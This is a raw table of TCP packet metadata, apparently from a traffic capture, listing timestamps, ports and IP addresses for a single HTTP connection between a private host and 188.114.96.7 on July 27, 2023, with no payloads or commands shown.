Jul 27, 2023 20:18:45.502187014 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.502235889 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.502284050 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.502294064 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.502331972 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.502381086 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.503258944 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.503307104 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.503355026 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.503360033 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.503402948 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.503449917 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.503452063 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.503715992 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.503772020 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.503808022 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.503823996 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.503871918 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.503885984 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.503921032 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.503968954 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.504714012 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.504765034 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.504812956 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.504822016 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.504853964 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.504894972 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.513487101 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.513577938 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.513617992 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.513649940 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.513686895 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.513693094 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.513758898 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.513811111 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.513813019 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.513875008 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.513922930 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.514170885 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.514430046 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.514481068 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.514529943 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.514545918 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.514578104 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.514620066 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.514622927 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.515216112 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.515264988 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.515289068 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.515311003 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.515315056 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.515362024 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.515400887 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.515408993 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.515458107 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.515497923 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.515503883 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.515552044 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.515597105 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.516120911 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.516170979 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.516220093 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.516285896 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.516335964 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.516354084 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.516382933 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.516429901 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.516433001 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.516477108 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.516628027 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.517008066 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.517056942 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.517102957 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.517153025 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.517211914 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.517225981 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.517273903 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.517323017 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.517369986 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.517421961 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.517935038 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.518029928 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.518079996 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.518127918 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.518174887 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.518189907 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.518223047 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.518270016 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.518276930 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.518318892 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.518367052 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.518414974 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.518979073 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.519057035 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.519182920 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.519232988 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.519279003 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.519301891 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.519328117 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.519376040 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.519378901 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.519424915 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.519474983 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.519478083 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.519848108 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.519900084 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.519938946 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.519948959 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.519992113 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.519996881 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.520044088 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.520090103 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.520090103 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.520137072 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.520183086 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.520194054 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.520690918 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.520768881 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.520832062 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.520883083 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.520934105 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.520936966 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.520982027 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.521029949 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.521029949 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.521078110 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.521123886 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.521125078 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.521172047 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.521226883 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.521770000 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.521821976 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.521871090 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.521902084 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.521919012 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.521955967 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.521965027 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.522012949 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.522058964 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.522059917 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.522106886 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.522150040 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.522685051 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.522737026 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.522797108 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.522809982 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.522849083 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.522892952 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.522897005 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.522943974 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.522986889 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.522991896 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.523039103 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.523085117 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.523612976 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.523663044 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.523713112 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.523725986 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.523762941 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.523808956 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.523813009 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.523863077 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.523907900 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.523910046 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.523958921 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.524008036 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.524008989 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.524595022 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.524671078 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.524672031 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.524750948 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.524792910 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.524796009 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.524836063 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.524877071 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.524883032 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.524926901 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.524967909 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.524970055 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.525552988 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.525621891 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.525645971 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.525692940 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.525784969 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.525835037 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.525836945 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.525877953 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.525918961 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.525918961 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.525969982 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.526012897 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.526340961 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.526386976 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.526478052 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.526540041 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.526583910 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.526626110 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.526632071 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.526668072 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.526709080 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.526709080 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.526751995 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.526814938 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.530096054 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530170918 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530205965 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.530220985 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530266047 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.530270100 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530317068 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530355930 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.530374050 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530421019 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530468941 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530471087 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.530656099 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530705929 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530756950 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530807018 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530808926 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.530853033 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530898094 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.530901909 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530947924 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.530996084 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.531363964 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.531774998 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.531835079 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.531836987 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.531882048 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.531928062 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.531946898 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.531975031 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.532017946 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.532021999 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.532068968 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.532114029 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.532115936 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.532596111 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.532650948 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.532696962 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.532742977 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.532752991 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.532788038 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.532835960 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.532840014 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.532881975 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.532927990 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.532927990 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.532974958 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.533021927 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.533200026 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.533247948 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.533294916 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.533313990 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.533340931 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.533386946 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.533396959 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.533456087 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.533499956 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.533505917 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.533546925 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.533595085 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.533601046 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.534143925 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.534199953 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.534280062 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.534326077 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.534369946 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.534408092 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.534418106 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.534463882 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.534471035 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.534512043 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.534539938 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.534554958 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.535161972 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.535200119 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.535227060 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.535239935 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.535267115 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.535278082 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.535293102 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.535320044 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.535332918 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.535345078 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.535372019 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.535387993 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.535398006 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.535439968 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.536063910 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.536096096 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.536158085 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.546967030 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547008038 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547048092 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547070026 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547091961 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547112942 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547127008 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547147036 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547162056 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547182083 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547199011 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547203064 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547218084 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547236919 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547239065 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547257900 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547332048 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547348976 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547348976 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547353983 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547374964 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547395945 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547415972 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547418118 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547437906 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547499895 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547504902 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547525883 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547542095 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547545910 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547564983 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547585964 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547590017 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547599077 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547604084 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547626019 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547636986 CEST	49683	80	192.168.2.4	188.114.96.7
Jul 27, 2023 20:18:45.547646046 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547665119 CEST	80	49683	188.114.96.7	192.168.2.4
Jul 27, 2023 20:18:45.547686100 CEST	80	49683	188.114.96.7	192.168.2.4
